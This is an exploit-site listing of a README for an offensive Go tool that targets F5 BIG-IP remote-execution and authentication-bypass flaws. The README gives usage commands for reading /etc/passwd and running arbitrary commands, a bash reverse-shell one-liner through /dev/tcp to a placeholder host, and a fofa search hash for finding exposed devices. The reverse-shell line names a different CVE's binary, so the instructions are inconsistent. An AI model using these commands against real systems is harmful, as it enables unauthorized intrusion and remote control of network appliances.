Sploitus

Exploit for Path Traversal in F5 Big-Ip Access Policy Manager

githubexploit Β· 2022-05-28

Exploit Code

README36 lines
## https://sploitus.com/exploit?id=DD05FAAD-D63E-5FF5-8097-1A447995D402
# F5-BIG-IP POC

POC set written in Go language, targeting CVE-2020-5902, CVE-2021-22986, and CVE-2022-1388. Additional F5 POCs will be added later.

Author: 160team.west9B

**This tool is intended for use by security researchers only under authorized circumstances. Please comply with network security laws. Any issues arising from its use are at your own risk, and are not related to the author.**

# 01 - Basic Information

**F5 POC Collection:**

CVE-2020-5902: F5 BIG-IP remote code execution vulnerability

CVE-2021-22986: F5 BIG-IP iControl REST unauthorized remote command execution vulnerability

CVE-2022-1388: Authentication bypass for remote command execution

# 02 - Usage Instructions

## Usage: ./F5-BIG-IP -u url

For CVE-2020-5902, if an arbitrary file download is attempted and `/etc/passwd` is returned, then the vulnerability exists.

For CVE-2021-22986 and CVE-2022-1388 POCs, if the `id` command is executed and `{id}` is returned, then the vulnerability exists. You can use `-c` to specify the command to execute.

## Reverse Shell

## Usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

# Screenshots
![Image text](https://github.com/west9b/F5-BIG-IP-POC/blob/main/poc.png)
![Image text](https://github.com/west9b/F5-BIG-IP-POC/blob/main/poc1.png)
# fofa
icon_hash="-335242539"